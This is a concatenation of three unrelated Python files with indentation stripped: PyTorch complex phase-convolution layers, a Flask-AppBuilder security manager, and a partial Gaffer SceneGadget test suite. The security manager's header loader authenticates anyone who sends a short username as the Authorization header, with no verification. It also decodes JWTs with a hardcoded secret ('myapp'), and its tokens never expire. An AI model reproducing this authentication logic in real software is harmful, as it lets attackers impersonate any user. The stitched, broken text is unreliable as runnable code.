def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class ComplexPhaseConvTranspose1d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(ComplexPhaseConvTranspose1d, self).__init__()
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose1d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose1d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose1d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose1d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose1d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
class ComplexPhaseConvTranspose2d(th.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
output_padding=0, groups=1, bias=None, dilation=1, padding_mode='zeros'):
super(ComplexPhaseConvTranspose2d, self).__init__()
if type(kernel_size) is int:
kernel_size = [kernel_size] * 2
self.weight = th.nn.Parameter(th.zeros(in_channels, int(out_channels / groups), kernel_size[0], kernel_size[1]))
if (bias is None) or (not bias):
self.bias = None
else:
self.bias = th.nn.Parameter(th.zeros(out_channels, 2))
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
weight = th.exp(1j * self.weight)
weight = th.fft.ifft(weight, dim=-1)
weight = th.fft.ifft(weight, dim=-2)
weight = th.view_as_real(weight)
if self.bias is None:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 0], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose2d(x[..., 0], weight[..., 1], bias=self.bias, stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
else:
x = th.stack((F.conv_transpose2d(x[..., 0], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) -
F.conv_transpose2d(x[..., 1], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation),
F.conv_transpose2d(x[..., 1], weight[..., 0], bias=self.bias[..., 0], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation) +
F.conv_transpose2d(x[..., 0], weight[..., 1], bias=self.bias[..., 1], stride=self.stride,
padding=self.padding, output_padding=self.output_padding, groups=self.groups, dilation=self.dilation)), dim=-1)
return x
if __name__ == '__main__':
import torch as th
device = th.device('cuda:0')
N, L = 6, 4
x = th.randn(N, 1, L, 2)
t = th.randn(N, 3, L, 2)
pconv = PhaseConv1d(1, 3, 3, 1, 1, bias=True)
pconv = pconv.to(device)
x, t = x.to(device), t.to(device)
y = pconv(x)
loss_fn = th.nn.MSELoss()
loss = loss_fn(y, t)
loss.backward()
print(x.shape)
print(y.shape)
print(loss.item())
N, H, W = 6, 16, 8
x = th.randn(N, 1, H, W, 2)
from flask_login import current_user, LoginManager
import logging
import json
import jwt
from sqlalchemy.ext.declarative import declared_attr
from flask_babel import lazy_gettext
import time
import hashlib
from typing import List
import requests
from flask import current_app,redirect, g, flash, request, session, abort, make_response
from flask_appbuilder.security.sqla import models as ab_models
from flask_appbuilder.security.sqla.manager import SecurityManager
from werkzeug.security import generate_password_hash
from flask_babel import lazy_gettext as _
from flask_appbuilder.security.views import (
PermissionModelView,
PermissionViewModelView,
RoleModelView,
UserModelView,
RoleListWidget,
RoleShowWidget,
)
from werkzeug.security import check_password_hash
from flask_appbuilder.security.sqla.models import (
assoc_permissionview_role,
assoc_user_role,
)
from flask import g
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Sequence,
String,
Table,
UniqueConstraint,
)
from sqlalchemy.orm import backref, relationship
from flask_appbuilder.security.decorators import has_access, has_access_api, permission_name
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_appbuilder.widgets import ListWidget
from flask_appbuilder.const import LOGMSG_WAR_SEC_LOGIN_FAILED
from sqlalchemy import or_
import xml.etree.ElementTree as ET
from myapp.exceptions import MyappSecurityException
from flask_appbuilder.security.views import AuthDBView, AuthRemoteUserView
from flask_appbuilder.security.views import expose
from flask_appbuilder import base
from flask_login import login_user, logout_user,login_manager
from flask_appbuilder.security.views import AuthDBView, AuthRemoteUserView
from flask_appbuilder.security.registerviews import RegisterUserDBView
from flask_appbuilder.security.forms import RegisterUserDBForm
from flask_appbuilder.security.views import expose
import xml.etree.ElementTree as ET
from functools import update_wrapper
from flask import redirect, g, flash, request, session, abort
from celery.schedules import crontab
from flask_appbuilder.security.sqla.models import assoc_permissionview_role
from sqlalchemy import select, Table
from flask_appbuilder.const import (
AUTH_DB,
AUTH_LDAP,
AUTH_OAUTH,
AUTH_OID,
AUTH_REMOTE_USER,
LOGMSG_ERR_SEC_AUTH_LDAP,
LOGMSG_ERR_SEC_AUTH_LDAP_TLS,
LOGMSG_WAR_SEC_LOGIN_FAILED,
LOGMSG_WAR_SEC_NO_USER,
LOGMSG_WAR_SEC_NOLDAP_OBJ,
PERMISSION_PREFIX
)
from flask_appbuilder.models.sqla import Model
from flask_appbuilder.actions import action
import pysnooper
import json
# Template for the user list page
class MyappSecurityListWidget(ListWidget):
"""
Redeclaring to avoid circular imports
"""
template = "myapp/fab_overrides/list.html"
# Template for the role list page
class MyappRoleListWidget(ListWidget):
"""
Role model view from FAB already uses a custom list widget override
So we override the override
"""
template = "myapp/fab_overrides/list_role.html"
def __init__(self, **kwargs):
kwargs["appbuilder"] = current_app.appbuilder
super().__init__(**kwargs)
# Customize the contents of the list, add and edit pages
UserModelView.list_columns= ["username", "active", "roles"]
UserModelView.edit_columns= ["first_name", "last_name", "username", "active", "email"]
UserModelView.add_columns= ["first_name", "last_name", "username", "email", "active", "roles"]
UserModelView.list_widget = MyappSecurityListWidget
RoleModelView.list_widget = MyappRoleListWidget
PermissionViewModelView.list_widget = MyappSecurityListWidget
PermissionModelView.list_widget = MyappSecurityListWidget
# Custom extension of the framework's built-in User model
from flask_appbuilder.security.sqla.models import User,Role
from sqlalchemy import Column, Integer, ForeignKey, String, Sequence, Table
# Modify the model binding
class MyUser(User):
__tablename__ = 'ab_user'
    org = Column(String(200))  # new attribute: organization
def get_full_name(self):
return self.username
    # Use the username as the display name
def __repr__(self):
return self.username
def is_admin(self):
user_roles = [role.name.lower() for role in list(self.roles)]
if "admin" in user_roles:
return True
return False
@property
def secret(self):
if self.changed_on:
pass
# help(self.changed_on)
# timestamp = int(func.date_format(self.changed_on))
timestamp = int(self.changed_on.timestamp())
payload = {
"iss": self.username # 用户名作为身份
# "iat": timestamp, # 签发期
# "nbf": timestamp, # 生效期
# "exp": timestamp + 60 * 60 * 24 * 30 * 12, # 有效期12个月
}
global_password = '<PASSWORD>'
encoded_jwt = jwt.encode(payload, global_password, algorithm='HS256')
encoded_jwt = encoded_jwt.decode('utf-8')
return encoded_jwt
return ''
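# Hedged illustration (not in the original code): the token produced by `secret`
# can be verified with the same shared secret. '<PASSWORD>' above is an elided
# placeholder; the real value must match whatever load_user_from_header decodes with.
#
# payload = jwt.decode(user.secret, '<PASSWORD>', algorithms=['HS256'])
# payload['iss']  # -> user.username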
# Custom Role model view
class MyRoleModelView(RoleModelView):
datamodel = SQLAInterface(Role)
order_columns = ["id"]
route_base = "/roles"
list_columns = ["name", "permissions"]
# Custom user model views
class MyUserRemoteUserModelView(UserModelView):
list_columns = ["username", "active", "roles", ]
edit_columns = ["first_name", "last_name", "username", "active", "email", "roles",'org' ]
add_columns = ["first_name", "last_name", "username", "email", "active", "roles",'org' ]
show_columns = ["username", "active", "roles", "login_count"]
list_widget = MyappSecurityListWidget
label_columns = {
"get_full_name": lazy_gettext("Full Name"),
"first_name": lazy_gettext("First Name"),
"last_name": lazy_gettext("Last Name"),
"username": lazy_gettext("User Name"),
"password": lazy_gettext("Password"),
"active": lazy_gettext("Is Active?"),
"email": lazy_gettext("Email"),
"roles": lazy_gettext("Role"),
"last_login": lazy_gettext("Last login"),
"login_count": lazy_gettext("Login count"),
"fail_login_count": lazy_gettext("Failed login count"),
"created_on": lazy_gettext("Created on"),
"created_by": lazy_gettext("Created by"),
"changed_on": lazy_gettext("Changed on"),
"changed_by": lazy_gettext("Changed by"),
"secret": lazy_gettext("Authorization"),
}
show_fieldsets = [
(
lazy_gettext("User info"),
{"fields": ["username", "active", "roles", "login_count",'secret']},
),
(
lazy_gettext("Personal Info"),
{"fields": ["first_name", "last_name", "email",'org'], "expanded": True},
),
(
lazy_gettext("Audit Info"),
{
"fields": [
"last_login",
"fail_login_count",
"created_on",
"created_by",
"changed_on",
"changed_by",
],
"expanded": False,
},
),
]
user_show_fieldsets = [
(
lazy_gettext("User info"),
{"fields": ["username", "active", "roles", "login_count",'secret']},
),
(
lazy_gettext("Personal Info"),
{"fields": ["first_name", "last_name", "email"], "expanded": True},
),
]
@expose("/userinfo/")
@has_access
def userinfo(self):
item = self.datamodel.get(g.user.id, self._base_filters)
widgets = self._get_show_widget(
g.user.id, item, show_fieldsets=self.user_show_fieldsets
)
self.update_redirect()
return self.render_template(
self.show_template,
title=self.user_info_title,
widgets=widgets,
appbuilder=self.appbuilder,
)
from myapp.project import MyCustomRemoteUserView
from myapp.project import Myauthdbview
# myapp's built-in roles and role permissions; various custom permissions are defined here
# In the base FAB SecurityManager, def load_user(self, pk): is what authenticates the user
# before_request assigns the authenticated user to g.user
# @pysnooper.snoop()
class MyappSecurityManager(SecurityManager):
user_model = MyUser # 用户使用自定义的用户
rolemodelview = MyRoleModelView #
    # Remote authentication
userremoteusermodelview = MyUserRemoteUserModelView
authremoteuserview = MyCustomRemoteUserView
    # Username/password authentication
userdbmodelview = MyUserRemoteUserModelView
authdbview = Myauthdbview
    # Work performed before each request: authentication
@staticmethod
def before_request():
g.user = current_user
# if len(request.path)>7 and request.path[:7]!='/static' and g.user and hasattr(g.user, 'username'):
# logging.info('------------%s(%s):%s'%(request.method,g.user.username,request.path))
def __init__(self, appbuilder):
super(MyappSecurityManager, self).__init__(appbuilder)
        # Add a way to authenticate from the request header
self.lm.header_loader(self.load_user_from_header)
    # Header-based authentication: look up the user by RTX name
# @pysnooper.snoop(depth=1)
def load_user_from_header(self, authorization_value):
# token=None
# if 'token' in request.headers:
# token = request.headers['token']
if authorization_value:
            # RTX name, allowed without token verification
if len(authorization_value) < 20:
username = authorization_value
if username:
user = self.find_user(username)
g.user = user
return user
            else:  # token authentication
encoded_jwt = authorization_value.encode('utf-8')
payload = jwt.decode(encoded_jwt, 'myapp', algorithms=['HS256'])
# if payload['iat'] > time.time():
# return
# elif payload['exp'] < time.time():
# return
# else:
user = self.find_user(payload['iss'])
g.user = user
return user
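    # Hedged client-side sketch (added for illustration; the URL and token variable
    # are assumptions): a caller can authenticate by sending the token, or a bare
    # RTX name, in the Authorization header.
    #
    # import requests
    # resp = requests.get('http://myapp.example.com/some/api',
    #                     headers={'Authorization': user_token})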
    # Custom user loader for login
def load_user(self, pk):
user = self.get_user_by_id(int(pk))
# set cookie
return user
    # Register the submenus and links under the Security menu
# @pysnooper.snoop()
def register_views(self):
if not self.appbuilder.app.config.get('FAB_ADD_SECURITY_VIEWS', True):
return
# Security APIs
self.appbuilder.add_api(self.security_api)
if self.auth_user_registration:
if self.auth_type == AUTH_DB:
self.registeruser_view = self.registeruserdbview()
elif self.auth_type == AUTH_OID:
self.registeruser_view = self.registeruseroidview()
elif self.auth_type == AUTH_OAUTH:
self.registeruser_view = self.registeruseroauthview()
if self.registeruser_view:
self.appbuilder.add_view_no_menu(self.registeruser_view)
self.appbuilder.add_view_no_menu(self.resetpasswordview())
self.appbuilder.add_view_no_menu(self.resetmypasswordview())
self.appbuilder.add_view_no_menu(self.userinfoeditview())
if self.auth_type == AUTH_DB:
self.user_view = self.userdbmodelview
self.auth_view = self.authdbview()
elif self.auth_type == AUTH_LDAP:
self.user_view = self.userldapmodelview
self.auth_view = self.authldapview()
elif self.auth_type == AUTH_OAUTH:
self.user_view = self.useroauthmodelview
self.auth_view = self.authoauthview()
elif self.auth_type == AUTH_REMOTE_USER:
self.user_view = self.userremoteusermodelview
self.auth_view = self.authremoteuserview()
else:
self.user_view = self.useroidmodelview
self.auth_view = self.authoidview()
if self.auth_user_registration:
pass
self.registeruser_view = self.registeruseroidview()
self.appbuilder.add_view_no_menu(self.registeruser_view)
self.appbuilder.add_view_no_menu(self.auth_view)
self.user_view = self.appbuilder.add_view(
self.user_view,
"List Users",
icon="fa-user",
href="/users/list/?_flt_2_username=",
label=_("List Users"),
category="Security",
category_icon="fa-cogs",
category_label=_("Security"),
)
role_view = self.appbuilder.add_view(
self.rolemodelview,
"List Roles",
icon="fa-group",
href="/roles/list/?_flt_2_name=",
label=_("List Roles"),
category="Security",
category_icon="fa-cogs",
)
role_view.related_views = [self.user_view.__class__]
if self.userstatschartview:
self.appbuilder.add_view(
self.userstatschartview,
"User's Statistics",
icon="fa-bar-chart-o",
label=_("User's Statistics"),
category="Security",
)
if self.auth_user_registration:
self.appbuilder.add_view(
self.registerusermodelview,
"User's Statistics",
icon="fa-user-plus",
label=_("User Registrations"),
category="Security",
)
self.appbuilder.menu.add_separator("Security")
self.appbuilder.add_view(
self.permissionmodelview,
"Base Permissions",
icon="fa-lock",
label=_("Base Permissions"),
category="Security",
)
self.appbuilder.add_view(
self.viewmenumodelview,
"Views/Menus",
icon="fa-list-alt",
label=_("Views/Menus"),
category="Security",
)
self.appbuilder.add_view(
self.permissionviewmodelview,
"Permission on Views/Menus",
icon="fa-link",
label=_("Permission on Views/Menus"),
category="Security",
)
# @pysnooper.snoop()
def add_org_user(self,username,first_name,last_name,org,email,roles,password="",hashed_password=""):
"""
Generic function to create user
"""
try:
user = self.user_model()
user.first_name = first_name
user.org = org
user.last_name = last_name
user.username = username
user.email = email
user.active = True
            user.roles += roles  # add the default registration roles
user.password=password
# if hashed_password:
# user.password = <PASSWORD>
# else:
# user.password = <PASSWORD>password_<PASSWORD>(password)
self.get_session.add(user)
self.get_session.commit()
try:
from myapp.models.model_team import Project_User, Project
public_project = self.get_session.query(Project).filter(Project.name == "public").filter(Project.type == "org").first()
if public_project:
project_user = Project_User()
project_user.project = public_project
project_user.role = 'dev'
project_user.user_id = user.id
self.get_session.add(project_user)
self.get_session.commit()
except Exception as e1:
self.get_session.rollback()
return user
except Exception as e:
self.get_session.rollback()
return False
    # Add the public project group
    # Register remote users on login
# @pysnooper.snoop()
def auth_user_remote_org_user(self, username,org_name='',password=''):
if not username:
return None
        # Look up the user
user = self.find_user(username=username)
        # Add a role with the same name as the organization, and also the parent role
        # Register a role with the same name as the RTX username
rtx_role = self.add_role(username)
        # Register the user if it does not exist yet
if user is None:
user = self.add_org_user(
username=username,
first_name=username,
last_name=username,
password=password,
                org=org_name,  # set the organization
email=username + "@<EMAIL>",
                roles=[self.find_role(self.auth_user_registration_role),rtx_role] if self.find_role(self.auth_user_registration_role) else [rtx_role,]  # add the default gamma role; the organization role is not added automatically for now
)
        elif not user.is_active:  # inactive users are not allowed to log in
print(LOGMSG_WAR_SEC_LOGIN_FAILED.format(username))
return None
if user:
gamma_role = self.find_role(self.auth_user_registration_role)
if gamma_role and gamma_role not in user.roles:
user.roles.append(gamma_role)
if rtx_role and rtx_role not in user.roles:
user.roles.append(rtx_role)
            # Update the user info
if org_name:
                user.org = org_name  # update the organization field
org_role = self.add_role(org_name)
if org_role not in user.roles:
user.roles.append(org_role)
self.update_user_auth_stat(user)
return user
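    # Hedged usage sketch (not from the original source): registering or logging in a
    # remote user by RTX name; 'alice' and 'physics' are made-up example values.
    #
    # user = appbuilder.sm.auth_user_remote_org_user('alice', org_name='physics')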
READ_ONLY_MODEL_VIEWS = {
'link','Minio','Kubernetes Dashboard','Granfana','Wiki'
}
USER_MODEL_VIEWS = {
"UserDBModelView",
"UserLDAPModelView",
"UserOAuthModelView",
"UserOIDModelView",
"UserRemoteUserModelView",
}
    # Menus that only admin can see
ADMIN_ONLY_VIEW_MENUS = {
"ResetPasswordView",
"RoleModelView",
"List Users",
"List Roles",
"UserStatsChartView",
"Base Permissions",
"Permission on Views/Menus",
"Action Log",
"Views/Menus",
"ViewMenuModelView",
"User's Statistics",
"Security",
} | USER_MODEL_VIEWS
ALPHA_ONLY_VIEW_MENUS = {}
    # Permissions that only admin has
ADMIN_ONLY_PERMISSIONS = {
"can_override_role_permissions",
"can_override_role_permissions",
# "can_approve", # db owner需要授权approve 权限后才能授权
"can_update_role",
}
READ_ONLY_PERMISSION = {"can_show", "can_list",'can_add'}
ALPHA_ONLY_PERMISSIONS = {
"muldelete"
}
    # Permissions that only exist for user-created menus
OBJECT_SPEC_PERMISSIONS = {
"can_only_access_owned_queries",
}
    # Basic permissions that everyone may have
ACCESSIBLE_PERMS = {"can_userinfo","can_request_access","can_approve"}
    # Check whether the user has the named permission on the given view
# @pysnooper.snoop()
def can_access(self, permission_name, view_name):
"""Protecting from has_access failing from missing perms/view"""
user = g.user
if user.is_anonymous:
return self.is_item_public(permission_name, view_name)
return self._has_view_access(user, permission_name, view_name)
    # Get the views on which the user has the given permission
def user_view_menu_names(self, permission_name: str):
from myapp import db
base_query = (
db.session.query(self.viewmenu_model.name)
.join(self.permissionview_model)
.join(self.permission_model)
.join(assoc_permissionview_role)
.join(self.role_model)
)
        # Non-anonymous user
if not g.user.is_anonymous:
# filter by user id
view_menu_names = (
base_query.join(assoc_user_role)
.join(self.user_model)
.filter(self.user_model.id == g.user.id)
.filter(self.permission_model.name == permission_name)
).all()
return set([s.name for s in view_menu_names])
        # Properly treat the anonymous user
public_role = self.get_public_role()
if public_role:
# filter by public role
view_menu_names = (
base_query.filter(self.role_model.id == public_role.id).filter(
self.permission_model.name == permission_name
)
).all()
return set([s.name for s in view_menu_names])
return set()
    # Add a permission on a view/menu
def merge_perm(self, permission_name, view_menu_name):
logging.warning(
"This method 'merge_perm' is | |
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import imath
import IECore
import IECoreScene
import IECoreGL
import Gaffer
import GafferTest
import GafferUI
import GafferUITest
import GafferScene
import GafferSceneUI
class SceneGadgetTest( GafferUITest.TestCase ) :
def testBound( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["transform"]["translate"]["x"].setValue( 2 )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["g"]["out"] )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
s["g"]["transform"]["translate"]["y"].setValue( 4 )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
s["g"]["transform"]["translate"].setValue( imath.V3f( 0 ) )
s["s"] = GafferScene.Sphere()
s["g"]["in"][1].setInput( s["s"]["out"] )
s["p"]["transform"]["translate"]["z"].setValue( 10 )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
# Nothing selected, so selected bound is empty
self.assertEqual( sg.bound( True ), imath.Box3f() )
sg.setExpandedPaths( IECore.PathMatcher( ["/group/"] ) )
sg.setSelection( IECore.PathMatcher( ["/group/plane"] ) )
sg.waitForCompletion()
self.assertEqual( sg.bound(), s["g"]["out"].bound( "/" ) )
# Only plane is selected
self.assertEqual( sg.bound( True ), s["p"]["out"].bound( "/" ) )
# Omitting plane takes just sphere
self.assertEqual( sg.bound( False, IECore.PathMatcher( ["/group/plane"]) ), s["s"]["out"].bound( "/" ) )
# Omitting only selected object while using selected=True leaves empty bound
self.assertEqual( sg.bound( True, IECore.PathMatcher( ["/group/plane"]) ), imath.Box3f() )
def assertObjectAt( self, gadget, ndcPosition, path ) :
viewportGadget = gadget.ancestor( GafferUI.ViewportGadget )
rasterPosition = ndcPosition * imath.V2f( viewportGadget.getViewport() )
gadgetLine = viewportGadget.rasterToGadgetSpace( rasterPosition, gadget )
self.assertEqual( gadget.objectAt( gadgetLine ), path )
def assertObjectsAt( self, gadget, ndcBox, paths ) :
viewportGadget = gadget.ancestor( GafferUI.ViewportGadget )
rasterMin = ndcBox.min() * imath.V2f( viewportGadget.getViewport() )
rasterMax = ndcBox.max() * imath.V2f( viewportGadget.getViewport() )
gadgetMin = viewportGadget.rasterToGadgetSpace( rasterMin, gadget ).p0
gadgetMax = viewportGadget.rasterToGadgetSpace( rasterMax, gadget ).p1
objectsAt = IECore.PathMatcher()
gadget.objectsAt( gadgetMin, gadgetMax, objectsAt )
objects = set( objectsAt.paths() )
expectedObjects = set( IECore.PathMatcher( paths ).paths() )
self.assertEqual( objects, expectedObjects )
def testObjectVisibility( self ) :
s = Gaffer.ScriptNode()
s["s"] = GafferScene.Sphere()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["s"]["out"] )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["g"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setMinimumExpansionDepth( 1 )
sg.setScene( s["a"]["out"] )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 1000 )
sg.waitForCompletion()
gw.getViewportGadget().frame( sg.bound() )
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
s["a"]["attributes"]["visibility"]["enabled"].setValue( True )
s["a"]["attributes"]["visibility"]["value"].setValue( False )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
s["a"]["attributes"]["visibility"]["enabled"].setValue( True )
s["a"]["attributes"]["visibility"]["value"].setValue( True )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
@unittest.skipIf( GafferTest.inCI(), "Unknown problem running in cloud" )
def testExpansion( self ) :
s = Gaffer.ScriptNode()
s["s"] = GafferScene.Sphere()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["s"]["out"] )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["g"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["a"]["out"] )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
sg.waitForCompletion()
gw.getViewportGadget().frame( sg.bound() )
self.waitForIdle( 10000 )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group" ] )
sg.setExpandedPaths( IECore.PathMatcher( [ "/group" ] ) )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "group", "sphere" ] ) )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group/sphere" ] )
sg.setExpandedPaths( IECore.PathMatcher( [] ) )
sg.waitForCompletion()
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertObjectsAt( sg, imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ), [ "/group" ] )
def testExpressions( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["in"][1].setInput( s["p"]["out"] )
s["g"]["in"][2].setInput( s["p"]["out"] )
s["e"] = Gaffer.Expression()
s["e"].setExpression( "parent['p']['dimensions']['x'] = 1 + context.getFrame() * 0.1" )
g = GafferSceneUI.SceneGadget()
g.setScene( s["g"]["out"] )
g.bound()
def testGLResourceDestruction( self ) :
s = Gaffer.ScriptNode()
s["p"] = GafferScene.Plane()
s["g"] = GafferScene.Group()
s["g"]["in"][0].setInput( s["p"]["out"] )
s["g"]["in"][1].setInput( s["p"]["out"] )
s["g"]["in"][2].setInput( s["p"]["out"] )
s["g"]["in"][3].setInput( s["p"]["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["g"]["out"] )
sg.setMinimumExpansionDepth( 2 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
# Reduce the GL cache size so that not everything will fit, and we'll
# need to dispose of some objects. We can't dispose of objects on any
# old thread, just the main GL thread, so it's important that we test
# that we're doing that appropriately.
IECoreGL.CachedConverter.defaultCachedConverter().setMaxMemory( 100 )
for i in range( 1, 1000 ) :
s["p"]["dimensions"]["x"].setValue( i )
self.waitForIdle( 10 )
def testExceptionsDuringCompute( self ) :
# Make this scene
#
# - bigSphere
# - littleSphere (with exception in attributes expression)
s = Gaffer.ScriptNode()
s["s1"] = GafferScene.Sphere()
s["s1"]["name"].setValue( "bigSphere" )
s["s2"] = GafferScene.Sphere()
s["s2"]["name"].setValue( "littleSphere" )
s["s2"]["radius"].setValue( 0.1 )
s["p"] = GafferScene.Parent()
s["p"]["in"].setInput( s["s1"]["out"] )
s["p"]["children"][0].setInput( s["s2"]["out"] )
s["p"]["parent"].setValue( "/bigSphere" )
s["a"] = GafferScene.StandardAttributes()
s["a"]["in"].setInput( s["p"]["out"] )
s["a"]["attributes"]["doubleSided"]["enabled"].setValue( True )
s["e"] = Gaffer.Expression()
s["e"].setExpression( 'parent["a"]["attributes"]["doubleSided"]["value"] = context["nonexistent"]' )
s["f"] = GafferScene.PathFilter()
